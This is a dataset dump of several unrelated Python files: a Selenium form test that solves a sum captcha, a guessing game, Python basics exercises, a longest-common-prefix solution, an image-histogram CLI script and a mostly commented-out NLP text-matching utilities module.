after clicking on the 'Submit button' """
def test_check_valid(self):
driver = self.driver
driver.get(self.baseURL) # Going to the desirable URL
FirstCheck = Firstassessment(driver)
TextBeforeSubmit = FirstCheck.textBeforeAndAfterSubmit() # Getting the sum expression text
print(TextBeforeSubmit) # Printing the sum expression text into console
FirstCheck.TextBoxName("Test") # Filling the Name field with "Text name"
FirstCheck.TextBoxMessage("Test") # Filling the Message field with "Text message"
FirstCheck.TextBoxWrongCaptcha("-1") # Filling the Result field with negative 1
FirstCheck.SubmitButton() #Clicking on the Submit button
TextAfterSubmit = FirstCheck.textBeforeAndAfterSubmit() # Getting the sum expression text after submit
print(TextAfterSubmit) # Printing the sum expression text into console after submit
if TextBeforeSubmit != TextAfterSubmit: # Verification (If stings aren't equal)
print("Numbers have changed") # Printing verification
else:
print("Numbers have not changed")
time.sleep(2)
"""This test will fill out form and it will fill out correct 'Result' which will result showing the success message
to the user. At the end it verifies that success msg is equal to 'Success'"""
def test_check_validtwo(self):
driver = self.driver
driver.get(self.baseURL) # Going to the desirable URL
SecondCheck = Firstassessment(driver)
textBeforeSubmitForm = SecondCheck.textBeforeAndAfterSubmit() # Getting the sum expression text after submit
print(textBeforeSubmitForm) # Printing the sum expression text before submit
captcha_list = textBeforeSubmitForm.split(' ') # Making list of printed sum expression text
print(captcha_list) # Printing list of sum expression text
firstnumberfromlist = captcha_list[0] # Making a string of the first element from the list of sum expression text
print(firstnumberfromlist) # Printing a string of the first element from the list of sum expression text
firstnumberfromlist = int(firstnumberfromlist)# Making integer of the first element from the list of sum expression text
print(firstnumberfromlist) # Printing integer of the first element from the list of sum expression text
secondnumberfromlist = captcha_list[2] # Making a string of the third element from the list of sum expression text
print(secondnumberfromlist) # Printing a string of the third element from the list of sum expression text
secondnumberfromlist = int(secondnumberfromlist) # Making integer of the third element from the list of sum expression text
print(secondnumberfromlist) # Printing integer of the third element from the list of sum expression text
captchacorectnumber = firstnumberfromlist + secondnumberfromlist # Sum of the first and third element from list
print(captchacorectnumber) # Printing sum of the first and third element from list
SecondCheck.TextBoxName("Test") # Filling the Name field with "Text name"
SecondCheck.TextBoxMessage("Test") # Filling the Message field with "Text message"
SecondCheck.BoxCapture(captchacorectnumber) # Filling correct number into captcha box
SecondCheck.SubmitButton() # Clicking on the Submit button
message = SecondCheck.SuccessMessage() # Verifying that success message is "Success"
print(message) #Printing "Success" message
time.sleep(4)
if __name__ == '__main__':
unittest.main() | true |
d390ade48721f90135c493fa7c95a58a735de80e | Python | alexyeet/guess-a-number | /guess_a_number.py | UTF-8 | 1,581 | 3.765625 | 4 | [] | no_license | import random
import math
#configuration
low=1
high=100
limit=round(math.log(high-low+1, 2) +.5)
#welcome screen
print ("welcome 2 g u e s s a n u m b e r")
#translating guess to numeric
def get_guess():
while True:
g = input("take a guess: ")
if g.isnumeric():
g=int(g)
return g
else:
print ("hey dude it's gotta be a number")
#play game
def play_again():
while True:
decision=input("wanna play again? (y/n)")
decision = decision.lower()
if decision == "y" or decision == "yes":
return True
elif decision == "n" or decision =="no":
return False
print ("i'm confused please say 'y' or 'n'")
again=True
while again:
#game start
print ("u got " + str(limit) + " guesses")
rand = random.randint(low, high)
print("i'm thinking of a number from "+str(low)+" to "+str(high)+".");
guess = -1
tries = 0
#play game
while guess != rand and tries < limit:
guess = get_guess()
if guess < rand:
print("too low")
elif guess > rand:
print("too high")
tries += 1
#game end
if guess == rand:
print ("yeet u did it")
print ("u should be a medical terminologist")
else:
print ("ur dumb as bricks it was actually " +str(rand))
print ("try taking medical terminology then try again :/")
again=play_again()
print ("see ya later")
| true |
76d519bf223668f16583334383196a975539db91 | Python | Jodiac92/pypro1 | /pack1/test1.py | UTF-8 | 907 | 3.6875 | 4 | [] | no_license | '''
여러줄 주석
'''
from builtins import isinstance
"""
여러줄 주석
"""
# 한줄 주석
# 변수 : 참조형
var1 = '안녕파이썬'
print(var1)
var1 = 5; print(var1)
var1 = 1.5; print(var1)
a = 10; b = 20.5
c = b
print(a,b,c)
print(id(a),id(b),id(c))
c = 10
print(a is b, a == b)
print(a is c, a == c)
A = 10
a = 5
print(A, ' ', a)
print('-----------------------')
import keyword
print('키워드 목록 : ',keyword.kwlist)
print('-----------------------')
print(10, oct(10), hex(10), bin(10))
print(10, 0o12, 0xa, 0b1010)
print('type(자료형) ------------')
print(7,type(7))
print(7.1,type(7.1))
print(7 + 2j,type(7 + 2j))
print(True,type(True))
print('a',type('a')) # 'a', "a"
print()
print((1,),type((1,)))
print([1],type([1]))
print({1},type({1}))
print({'k':1},type({'k':1}))
a = 5
print(isinstance(a, int))
print(isinstance(a, list)) | true |
b5db8e790e549c1e7f672bfadb4ca484df92a760 | Python | KseniaMIPT/Adamasta | /1sem/lab5/Z4.py | UTF-8 | 404 | 3.328125 | 3 | [] | no_license | A = [1,2,3,4,5,6,7]
for i in range(0, len(A) - len(A) % 2, 2):
A[i], A[i +1] = A[i + 1], A[i]
print(A)
A = [1, 2, 3, 4, 5]
A.insert(0,A[-1])
print(A[:-1])
A = [1,2,2,2,3,3,34,8]
B = str()
for i in range(len(A)):
if A.count(A[i]) == 1:
print(A[i])
A = [1, 2, 3, 2, 3, 3]
a = -1
max = 0
for i in range(len(A)):
a += 1
b = A.count(A[a])
if b > max:
max = b
print(max)
| true |
c317c6bb1470df9bfaea57817175935ca8ef11eb | Python | bitterengsci/algorithm | /九章算法/String问题/78.Longest Common Prefix.py | UTF-8 | 957 | 3.546875 | 4 | [] | no_license | #-*-coding:utf-8-*-
'''
Description
Given k strings, find the longest common prefix (LCP).
'''
class Solution:
"""
@param strs: A list of strings
@return: The longest common prefix
"""
def longestCommonPrefix(self, strs):
prefix = ""
if strs == []:
return prefix
if len(strs) == 1:
return strs[0]
min_len = min(len(s) for s in strs)
for i in range(min_len):
if all(strs[0][i] == s[i] for s in strs[1:]):
prefix += strs[0][i]
return prefix
def longestCommonPrefix2(self, strs):
if len(strs) <= 1:
return strs[0] if len(strs) == 1 else ""
end, minl = 0, min([len(s) for s in strs])
while end < minl:
for i in range(1, len(strs)):
if strs[i][end] != strs[i - 1][end]:
return strs[0][:end]
end += 1
return strs[0][:end]
| true |
a7d1db45143b5130c2ad0ce05d65c289e83804bc | Python | matheusgomes28/PapApp | /frontend/model_hist.py | UTF-8 | 5,008 | 3.375 | 3 | [] | no_license | """model_hist.py
Python script for creating a model histogram. Given
a image directory, it will load all the images and
calculate the mean histogram of the loaded images.
If givne a file instead, it will use the function in
the file as the generator for the histogram.
Usage:
model_hist.py --dir=DPATH
model_hist.py --file=FPATh
model_hist.py -h | --help
Options:
-d DPATH --dir=DPATH Indicate the image directory to use.
-f FPATH --file=FPATH Indicate the file path to use.
"""
# Impor the files package
import os, sys
sys.path.append(os.path.abspath("../"))
from utils import files
# Import for the CLI
from docopt import docopt
from colorama import Fore, Style, init
# The standard imports from fronend package
from frontend import analysis as an
from frontend import utilities as ut
# For the maths stuff
import numpy as np
from matplotlib import pyplot as plt
def loading_bar(curent, N, size=20):
"""
Simple loading bar for command lines.
Should work well on unix systems.
Args:
current - Current index in iteration.
N - Last possible index.
size - Size of loading bar in chars.
"""
perc = (current+1)/N
bar = int(np.round(perc*size))
line = "Processing ["
line += "="*bar + " "*(size-bar)
line += "] {:d}%".format(int(np.round(perc*100)))
ut.update_line(line) # This will deal with the carriage return stuff
# Note everything is printed to sys.out
def main():
"""
Main method, where all the actual logic goes into.
CLI args parsing is done with docopt and colorama,
then the Numpy packages are used to get the histogram.
"""
######################
## ARGUMENT PARSING ##
######################
args = docopt(__doc__)
# Print out the passed args
init() # Init windows ANSI
print("Arguments passed")
dir_text = "Use directory? "
if args["--dir"]:
dir_text += "YES"
dir_text += ", " + args["--dir"]
else: dir_text += "NO"
file_text = "Use file? "
if args["--file"]:
file_text += "YES"
file_text += ", " + args["--file"]
else: file_text += "NO"
# Now just print out the results
print(Fore.GREEN + dir_text); print(file_text)
#############################
## IMAGE DIRECTORY LOADING ##
#############################
if args["--dir"]:
# Parse path and make sure it exists
path = files.abspath(args["--dir"])
if not files.exists(path):
print(Fore.RED + "Path does not exists. Exiting.." + Style.RESET_ALL)
sys.exit()
# Create the histogram accumulator
path = files.abspath(args["--dir"])
img_paths = files.get_images(path)
num_images = len(img_paths)
hist_acc = np.zeros((num_images, 256)) # N_IMAGES x INTENSITIES
print(Fore.BLUE + "Number of images ot load: {}".format(num_images))
for i, path in enumerate(img_paths):
# Load image in greyscale
image = ut.read_image(path, "BGR2GRAY")
# Update Nth row with the current histogram
hist = an.get_histogram(image)
hist /= np.sum(hist)
hist_acc[i,:] = np.ravel(hist)
# Now that we have accumulated the hist, take the mean
model_hist = np.mean(hist_acc, axis=0)
# Plot and save the results
fig = plt.figure(figsize=(5, 2))
ax1 = plt.gca()
ax1.set_title("Histogram obtained")
ax1.plot(model_hist)
fig.tight_layout(); plt.show();
np.savetxt("model_hist.txt", model_hist)
###########################
## FILE FUNCTION LOADING ##
###########################
if args["--file"]:
# Again, parse path and make sure file exists
path = files.abspath(args["--file"])
if not files.exists(path):
print(Fore.RED + "File does not exist. Exiing.." + Style.RESET_ALL)
# Create the sample array for handling
X = np.arange(256) # [0,255] for the intensities
# Open the file and eval it
with open(path, 'r') as f:
expr = f.read().strip()
try:
# Get he values from he funciton
Y = eval(expr)
# Normalise the stuff
Y = Y / np.sum(Y)
# Save the file
np.savetxt("model_hist.txt", Y )
except SyntaxError: # For the error in the code.
print("Invalid syntax in the function file. Exiting.")
sys.exit()
except NameError: # For the variable name errors.
print("Undefined name given in function file. Exiting")
sys.exit()
# Plot tthe suff
fig = plt.figure(figsize=(5,2))
ax1 = plt.gca()
ax1.set_title("Hisogram Created")
ax1.plot(Y)
fig.tight_layout(); plt.show()
# Init method
if __name__ == "__main__":
main()
| true |
fa15ba9f3fd79efa90e380a0dd80f40a7fa2df99 | Python | DmSide/DmSide-ai_code_analysis_tools | /source_code/lib/tools.py | UTF-8 | 31,555 | 2.625 | 3 | [] | no_license | # """useful features"""
import re
import os
import sys
import traceback
# import iso639
# import requests
# import json
import numpy
import difflib
# import string
import ctypes
from itertools import permutations, product
# from lib.text import Text
#
# # from lib.mongo_connection import MongoConnection
#
# punctuation = '[!"#$%&\\\'()*+,-./:;<=>?@[\\]^_`{|}~]'
#
# def sample_update_matches(back_map, origin_text, matches):
# # origin_text MUST BE unicode type. In other case we have the wrong length of string and position of words
# utf_origin_text = origin_text # if isinstance(origin_text, unicode) else origin_text.decode('utf-8')
# for match in matches:
# start_match = match['start_match']
# match['start_match'] = int(back_map[start_match])
# match['length_match'] = int(back_map[start_match + match['length_match'] - 1] - match['start_match'] + 1)
# match['word'] = utf_origin_text[match['start_match']: match['start_match'] + match['length_match']]
# return matches
#
#
# def sample_strip(samples):
# """removes spaces at the beginning and at the end"""
# if isinstance(samples, list):
# result = []
# for sample in samples:
# result.append(sample.strip())
# return result
# # if isinstance(samples, str) or isinstance(samples, unicode):
# if isinstance(samples, str): # Add SIDE(PY3)
# return samples.strip()
# return samples
#
#
# def delete_in_sample(sample, start, count):
# """removes "count" elements from the "start" index"""
# end = start + count - 1
# string = sample['string']
# if len(string) < start + count or start < 0 or count <= 0:
# return sample
# new_sample = {}
# new_matches = []
# for match in sample['matches']:
# sm = match['start_match']
# lm = match['length_match']
# rm = sm + lm - 1
# new_match = {}
# if start < sm:
# new_start_match = start if end >= sm - 1 else sm - count
# else:
# new_start_match = sm
# if end < sm or start > rm:
# new_match['start_match'] = new_start_match
# new_match['length_match'] = lm
# new_matches.append(new_match)
# else:
# new_length_match = ((rm - end) if (rm > end) else 0) + ((start - sm) if (sm < start) else 0)
#
# if new_length_match > 0:
# new_match['start_match'] = new_start_match
# new_match['length_match'] = new_length_match
# new_matches.append(new_match)
#
# new_sample['matches'] = new_matches
# new_sample['string'] = string[:start]+string[start+count:]
# return new_sample
#
#
# def sample_strip_and_recalc_matches(sample):
# """removes spaces at the beginning and at the end AND recalc matches"""
# ret_sample = sample
# string = sample["string"]
# len_string = len(string)
# zeros_left = len_string - len(string.lstrip())
# zeros_right = len_string - len(string.rstrip())
# if zeros_right > 0:
# ret_sample = delete_in_sample(ret_sample, len_string - zeros_right, zeros_right)
# if zeros_left > 0:
# ret_sample = delete_in_sample(ret_sample, 0, zeros_left)
# return ret_sample
#
#
# def sample_remove_tabs(origin_text, result='map', mode='min'):
# """Remove tabs and multiple spaces"""
# if mode == 'min':
# tab = '\t'
# else:
# tab = '\s'
# new_text = re.sub(tab, ' ', origin_text)
# new_text = re.sub(' +', ' ', new_text)
# if result == 'map':
# skip_map = check_skip_string(new_text, origin_text)
# back_map = numpy.where(numpy.array(skip_map) == 0)[0]
# return new_text, back_map
# elif result == 'skip':
# skip_map = check_skip_string(new_text, origin_text)
# return new_text, skip_map
# else:
# return new_text
#
#
# def fixing_line_breaks(text):
# return re.sub('[\n\r\f]+', '.', text)
#
#
# def adaptiv_remove_tab(origin_text):
# punctuation_sign = '[!"#$%&\'()*+,-\./:;<=>?@[\\]^_`{|}~]'
# tab = '[\n\r\f]'
#
# end = 0
# new_text = ''
# for match in re.finditer('{0}{1}+'.format(punctuation_sign, tab), origin_text):
# # b = match.regs[0] # Delete SIDE(PY3)
# b = match.span() # Add SIDE(PY3)
# new_text += origin_text[end:(b[0] + 1)] + ' '*(b[1] - b[0] - 1)
# end = b[1]
# new_text += origin_text[end:]
# fixed_text = new_text
#
# end = 0
# new_text = ''
# for match in re.finditer('{1}+(?={0})'.format(punctuation_sign, tab), fixed_text): # ' '
# # b = match.regs[0] # Delete SIDE(PY3)
# b = match.span() # Add SIDE(PY3)
# new_text += fixed_text[end:(b[0])] + ' ' * (b[1] - b[0] - 1)
# end = b[1]
# new_text += fixed_text[end:]
# fixed_text = new_text
#
# end = 0
# new_text = ''
# for match in re.finditer('{1}+(?!{0})'.format(punctuation_sign, tab), fixed_text): # '.'
# # b = match.regs[0] # Delete SIDE(PY3)
# b = match.span() # Add SIDE(PY3)
# new_text += fixed_text[end:(b[0])] + '.' + ' ' * (b[1] - b[0] - 1)
# end = b[1]
# new_text += fixed_text[end:]
# fixed_text = new_text
#
# new_text = re.sub(' +', ' ', fixed_text)
# skip_map = check_skip_string(new_text, fixed_text)
# back_map = numpy.where(numpy.array(skip_map) == 0)[0]
# return new_text, back_map
#
#
# def remove_tab(origin_text):
# tab = '\s'
# fixed_text = re.sub(tab, ' ', origin_text)
# new_text = re.sub(' +', ' ', fixed_text)
# skip_map = check_skip_string(new_text, fixed_text)
# back_map = numpy.where(numpy.array(skip_map) == 0)[0]
# return new_text, back_map
#
#
# def fixe_samples_match(skip_map, origin_matches):
# matches = []
# if sum(skip_map) > 0:
# shift_map = numpy.cumsum(skip_map)
# for match in origin_matches:
# new_match = {}
# start_origin = match['start_match']
# new_match['start_match'] = start_origin - shift_map[start_origin]
# end_origin = start_origin + match['length_match'] - 1
# new_match['length_match'] = end_origin - shift_map[end_origin] - new_match[
# 'start_match'] + 1
# matches.append(new_match)
# else:
# matches = list(origin_matches)
# return matches
#
#
# def to_lower(text):
# if isinstance(text, str):
# return text.lower() # Add SIDE(PY3)
# # return string.lower(text) # Delete SIDE(PY3)
#
# # if isinstance(text, unicode): # Delete SIDE(PY3)
# # return unicode.lower(text) # Delete SIDE(PY3)
# return text
#
#
# def sort_model(models, tag='type'):
# """groups models by type"""
# result_set = {}
# for model in models:
# if model[tag] not in result_set:
# result_set[model[tag]] = [model]
# else:
# result_set[model[tag]].append(model)
# return result_set
#
#
# def get_abs_path(path):
# """"""
# path = path if os.path.isabs(path) else \
# os.path.abspath(
# os.path.join(
# os.path.dirname(os.path.dirname(sys.modules['nlp.config'].__file__)),
# path
# )
# )
# return path
#
#
# def find_nth_overlapping(haystack, needle, n):
# """find n-ed entrance needle to haystack"""
# start = -1
# while start >= 0 and n > 0:
# start = haystack.find(needle, start+1)
# n -= 1
# return start
#
#
# def search_positions_entity(entity):
# """Search positions entity in polyglot.entities"""
# pos_token = 0
# entry = 0
# for token in entity.parent.tokens:
# if pos_token == entity.start:
# break
# if token == entity.parent.tokens[entity.start]:
# entry += 1
# pos_token += 1
# start = find_nth_overlapping(entity.parent.row, entity.parent.tokens[entity.start], entry + 1)
#
# if len(entity._collection) > 1:
# pos_token = 0
# entry = 0
# for token in entity.parent.tokens:
# if pos_token == (entity.end-1):
# break
# if token == entity.parent.tokens[entity.end-1]:
# entry += 1
# pos_token += 1
# start_lost = find_nth_overlapping(entity.parent.row, entity.parent.tokens[entity.end-1], entry + 1)
# end = start_lost + len(entity.parent.tokens[entity.end-1])
# else:
# end = start + len(entity.parent.tokens[entity.start])
# return start, end
#
#
# def search_positions_word(word, index_word, polyglot_text):
# """Search positions entity in polyglot.words"""
# pos_token = 0
# entry = 0
# for token in polyglot_text.words:
# if pos_token == index_word:
# break
# if token == word:
# entry += 1
# pos_token += 1
# start = find_nth_overlapping(polyglot_text.row, word, entry + 1)
# end = start + len(word)
# return start, end
#
#
# def message_box(text='', head='', type_box=0):
# """Universal message box"""
# if sys.platform == "linux" or sys.platform == "linux2":
# # linux
# pass
# elif sys.platform == "darwin":
# # OS X
# pass
# elif sys.platform == "win32":
# # Windows...
# ctypes.windll.user32.MessageBoxA(None, text, head, type_box)
#
#
# class ParseStanfordTSV(object):
# """Converts and filters the stanford NER classification results"""
# def __init__(self, classification, set_tags, origin_text):
# self.classification = classification
# self.set_tags = set_tags
# self.origin_text = origin_text
#
# def __iter__(self):
# end_pos = 0
# for word_class in re.finditer('.+(?<!\r)(?=\r?\n)', self.classification):
# try:
# # word, tag = string.split(word_class.group(0), '\t')
# word, tag = str.split(word_class.group(0), '\t')
# start_pos = self.origin_text.find(word, end_pos)
# end_pos = start_pos + len(word)
# if tag in self.set_tags:
# yield {'match': {'start_match': start_pos,
# 'length_match': len(word),
# 'word': word},
# 'tag': tag}
# except:
# pass
#
#
# class ParsePolyglot(object):
# """Converts and filters the polyglot entities"""
# def __init__(self, classification, set_tags, origin_text, text_class):
# self.classification = classification
# self.set_tags = set_tags
# self.origin_text = origin_text
# self.text_class = text_class
#
# def __iter__(self):
# end_pos = 0 # Delete SIDE
# # end_pos = {'I-ORG': 0, 'I-PER': 0, 'I-LOC': 0} # Add SIDE
# for word_class in self.classification:
# try:
# if word_class.tag in self.set_tags:
# # end_pos = 0 # Add SIDE
# for i in range(word_class.start, word_class.end):
# utf8_units = self.text_class.words[i]
# try:
# utf8_units = utf8_units.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
#
# # DELETE SIDE
# if i == word_class.start:
# start_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = self.origin_text.find(utf8_units, end_pos) + len(utf8_units)
#
# yield {'match': {'start_match': start_pos,
# 'length_match': len(self.origin_text[start_pos: end_pos]),
# 'word': self.origin_text[start_pos: end_pos]},
# 'tag': word_class.tag}
#
# # ADD SIDE
# # if i == word_class.start:
# # start_pos = self.origin_text.find(utf8_units, end_pos[word_class.tag])
# # end_pos[word_class.tag] = self.origin_text.find(utf8_units, end_pos[word_class.tag]) + len(utf8_units)
# #
# # if self.origin_text[start_pos: end_pos[word_class.tag]] not in ['', '_', '→']: # Add SIDE
# # yield {'match': {'start_match': start_pos,
# # 'length_match': len(self.origin_text[start_pos: end_pos[word_class.tag]]),
# # 'word': self.origin_text[start_pos: end_pos[word_class.tag]]},
# # 'tag': word_class.tag}
# except:
# pass
#
#
# class ParsePolyglotPolarity(object):
# """Converts and filters the polyglot entities"""
# def __init__(self, classification, set_tags, origin_text, dict_tags):
# self.classification = classification
# self.set_tags = set_tags
# self.origin_text = origin_text
# self.dict_tags = dict_tags
#
# def __iter__(self):
# end_pos = 0
# for word in self.classification:
# try:
# tag = word.polarity
# # utf8_units = word if isinstance(word, unicode) else word.decode('utf8') # Delele SIDE(PY3)
# utf8_units = word
# try:
# utf8_units = utf8_units.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# start_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = start_pos + len(utf8_units)
# if tag:
# if self.dict_tags[tag] in self.set_tags:
# yield {'match': {'start_match': start_pos,
# 'length_match': len(utf8_units),
# 'word': utf8_units},
# 'tag': self.dict_tags[tag]}
# except:
# print(get_error())
#
#
# class EncodingPredictEntity(object):
# def __init__(self, matches, origin_text):
# self.matches = matches
# self.origin_text = origin_text
#
# def __iter__(self):
# end_pos = 0
# entity = self.matches['entity']
# matches = []
# doc = self.origin_text
# for match in self.matches['matches']:
# tag = '<{}>'.format(match['tag'])
# start = doc.find(match['match']['word'], end_pos)
# length = match['match']['length_match']
# doc = doc[:start] + tag + doc[start + length:]
# start_pos = doc.find(tag, end_pos)
# end_pos = start_pos + len(tag)
# matches.append({'match': {'start_match': start,
# 'length_match': end_pos - start_pos},
# 'tag': match['tag']})
# yield {'matches': matches,
# 'entity': entity,
# 'string': doc}
#
#
# class DecodingPredictEntity(object):
#
# def __init__(self, match, words):
# self.match = match
# self.words = words
# tags = [match['tag'] for match in match['matches']]
# self.tags = dict((tag, tags.count(tag)) for tag in tags)
#
# def __iter__(self):
# combination_words = []
# tags = self.tags.keys()
# for tag in tags:
# count = self.tags[tag]
# if count == 1:
# combination_words.append(self.words[tag])
# else:
# combination_words.append(list(permutations(self.words[tag], self.tags[tag])))
# combination = list(product(*combination_words))
# samples = []
# for comb in combination:
# sample = self.replace(self.match['string'], tags, comb)
# samples.append(sample)
# samples.append({'string': self.match['string'],
# 'matches': self.match['matches'],
# 'entity': self.match['entity']})
# yield samples
#
# def replace(self, doc, tags, combination):
# document = doc
# words = {}
# for tag in tags:
# words[tag] = combination[tags.index(tag)].__iter__()
# end_pos = 0
# matches = []
# for match in self.match['matches']:
# word = words[match['tag']].next()
# tag = '<{}>'.format(match['tag'])
# start = document.find(tag, end_pos)
# length = match['match']['length_match']
# document = document[:start] + word + document[start + length:]
# start_pos = document.find(word, end_pos)
# end_pos = start_pos + len(word)
# matches.append({'match': {'start_match': start,
# 'length_match': end_pos - start_pos,
# 'word': word},
# 'tag': match['tag']})
# return {'string': document,
# 'matches': matches,
# 'entity': self.match['entity']}
#
#
# class ParseMatchesMorphemes(object):
# """Converts and filters the polyglot entities"""
# def __init__(self, matches, text, lang=None):
# self.matches = matches
# if isinstance(text, Text):
# self.text_class = text
# self.origin_text = text.raw
# else:
# self.origin_text = text
# self.text_class = Text(text, hint_language_code=lang)
#
# def __iter__(self):
# end_pos = 0
# ini_pos = 0
# left_pos = 0
# right_pos = 0
# n_word = -1
# n_word_start = 0
# # morphemes = [ morph.string.strip() for morph in self.text_class.morphemes]
# morphemes = []
# [morphemes.extend(morph.morphemes) for morph in self.text_class.tokens]
# for match in self.matches:
# if right_pos > match[0]:
# n_word = n_word_start - 1
# end_pos = left_pos
# while match[0] > end_pos:
# n_word += 1
# ini_pos = self.origin_text.find(morphemes[n_word], end_pos)
# end_pos = ini_pos + len(morphemes[n_word])
# n_word_start = n_word
# left_pos = ini_pos
# while end_pos < match[1]:
# right_pos = end_pos
# n_word += 1
# ini_pos = self.origin_text.find(morphemes[n_word], end_pos)
# end_pos = ini_pos + len(morphemes[n_word])
# if end_pos > match[1]:
# end_pos -= len(morphemes[n_word])
# n_word -= 1
# if ini_pos <= match[1]:
# right_pos = end_pos
# yield [self.origin_text[left_pos: right_pos], left_pos, right_pos]
#
#
# class ParseMatchesWords(object):
# """Converts and filters the polyglot entities"""
# def __init__(self, matches, text, lang=None):
# self.matches = matches
# if isinstance(text, Text):
# self.text_class = text
# self.origin_text = text.row
# else:
# self.origin_text = text
# self.text_class = Text(text, hint_language_code=lang)
#
# def __iter__(self):
# end_pos = 0
# ini_pos = 0
# left_pos = 0
# right_pos = 0
# n_word = -1
# n_word_start = 0
# for match in self.matches:
# if right_pos > match[0]:
# n_word = n_word_start - 1
# end_pos = left_pos
# while match[0] > end_pos:
# n_word += 1
# ini_pos = self.origin_text.find(self.text_class.words[n_word], end_pos)
# end_pos = ini_pos + len(self.text_class.words[n_word])
# n_word_start = n_word
# left_pos = ini_pos
# while end_pos < (match[1]):
# right_pos = end_pos
# n_word += 1
# ini_pos = self.origin_text.find(self.text_class.words[n_word], end_pos)
# end_pos = ini_pos + len(self.text_class.words[n_word])
# if ini_pos <= (match[1]):
# right_pos = end_pos
#
# yield [self.origin_text[left_pos: right_pos], left_pos, right_pos]
#
#
# class ParseMatchesUnits(object):
# """"""
# def __init__(self, matches, text, units, units_tag=None):
# self.matches = matches
# try:
# text = text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# self.origin_text = text
# self.units = units
# self.units_tag = units_tag
#
# def __iter__(self):
#
# for match in self.matches:
# end_pos = -1
# ini_pos = 0
# left_pos = -1
# right_pos = -1
# n_word = -1
# n_word_start = 0
# tag_match = []
# if right_pos > match[0]:
# n_word = n_word_start
# end_pos = left_pos
# while match[0] > end_pos:
# n_word += 1
# utf8_units = self.units[n_word]
# try:
# utf8_units = utf8_units.decode('utf8')
# except:
# pass
# end_pos = max(end_pos, 0)
# ini_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = ini_pos + len(utf8_units)
#
# n_word_start = max(n_word, 0)
# left_pos = ini_pos
# # end_pos = ini_pos
#
# while end_pos < match[1]:
# right_pos = end_pos
# if self.units_tag and n_word > -1:
# tag_match.append(self.units_tag[n_word][1])
# n_word += 1
# utf8_units = self.units[n_word]
# try:
# utf8_units = utf8_units.decode('utf8')
# except:
# pass
# ini_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = ini_pos + len(utf8_units)
# if ini_pos <= match[1]:
# right_pos = end_pos
# if self.units_tag:
# tag_match.append(self.units_tag[n_word][1])
# n_word += 1
# n_word -= 1
#
# if self.origin_text[left_pos: right_pos]==u'':
# pass
# yd = [self.origin_text[left_pos: right_pos], left_pos, right_pos, n_word_start, n_word, tag_match]
# yield yd
#
#
# class ParseMatchesUnitsBack(object):
# """"""
# def __init__(self, matches, text, units, units_tag=None):
# self.matches = matches
# try:
# text = text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# self.origin_text = text
# self.units = units
# self.units_tag = units_tag
#
# def __iter__(self):
# end_pos = 0
# ini_pos = 0
# left_pos = 0
# right_pos = 0
# n_word = -1
# n_word_start = 0
# for match in self.matches:
# tag_match = []
# if n_word > match[0]:
# n_word = n_word_start - 1
# end_pos = left_pos
# while match[0] > n_word:
# n_word += 1
# utf8_units = self.units[n_word]
# try:
# utf8_units = utf8_units.decode('utf8')
# except:
# pass
# ini_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = ini_pos + len(utf8_units)
# n_word_start = n_word
# left_pos = ini_pos
# while n_word <= match[1]:
# right_pos = end_pos
# if self.units_tag:
# tag_match.append(self.units_tag[n_word][1])
# n_word += 1
# if n_word >= len(self.units):
# break
# utf8_units = self.units[n_word]
# try:
# utf8_units = utf8_units.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# ini_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = ini_pos + len(utf8_units)
#
# yield [self.origin_text[left_pos: right_pos], left_pos, right_pos, n_word_start, n_word-1, tag_match]
#
#
# def check_skip_string_old(text, origin_text):
# try:
# text = text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# try:
# origin_text = origin_text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# j = 0
# dif_map = [0]*len(origin_text)
# for i in range(len(text)):
# while text[i] != origin_text[j]:
# dif_map[j] = 1
# j += 1
# j += 1
# return dif_map
#
#
# def check_skip_string(text, origin_text):
# try:
# text = text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# try:
# origin_text = origin_text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# dif_map = [1]*len(origin_text)
# diff = difflib.SequenceMatcher(None, text, origin_text)
# last_match = {'a': -1, 'b': -1}
# matches = diff.get_matching_blocks()
# for match in diff.get_matching_blocks():
# if match.size == 0:
# break
# f = last_match['b'] + 1
# ff = match.a - last_match['a'] - 1
# key = range(last_match['b'] + 1, last_match['b'] + 1 + match.a - last_match['a'] - 1)
# dif_map[last_match['b'] + 1: last_match['b'] + match.a - last_match['a']] = [0 for i in key]
# key = range(match.b, match.b + match.size)
# dif_map[match.b: match.b + match.size] = [0 for i in key]
# last_match = {'a': match.a + match.size - 1, 'b': match.b + match.size - 1}
# return dif_map
#
#
# def check_intersection_range(range1, range2):
# """"""
# result = False
# if range1[0] >= range2[0] and range1[0] <= range2[1]:
# result = True
# elif range1[1] >= range2[0] and range1[1] <= range2[1]:
# result = True
# elif range2[0] >= range1[0] and range2[0] <= range1[1]:
# result = True
# elif range2[1] >= range1[0] and range2[1] <= range1[1]:
# result = True
# return result
#
#
# def list_decode(data, codec='utf-8'):
# """"""
# return [x.decode(codec) for x in data]
def get_error():
ex_type, ex, tb = sys.exc_info()
results = {'TypeError': str(ex_type),
'MessageError': str(ex),
'TracebackError': "".join(traceback.format_exc())
}
return results
# def send_post(url, data, cls=None):
# try:
# req = requests.post(url, json=data)
# print("Status: {0}. Url: {2}. Response: {1} ").format(req.status_code, req.text, url)
# except requests.RequestException:
# print("Status: {0}. Url: {2}. Response: {1} ").format(404, None, url)
# except Exception:
# error = get_error()
# print(error)
#
#
# def send_many_post(urls, data, cls=None):
# if not isinstance(urls, list):
# urls = [urls]
# for url in urls:
# send_post(url, data)
# def create_tmp_file():
# from nlp.config import TEMP_FILES_DIRECTORY
# path = get_abs_path(TEMP_FILES_DIRECTORY)
# if not os.path.isdir(path):
# os.mkdir(path)
# import uuid
# name = os.path.join(path, str(uuid.uuid4()))
# f = open(name, 'w')
# return f
#
#
# def open_tmp_file(fname):
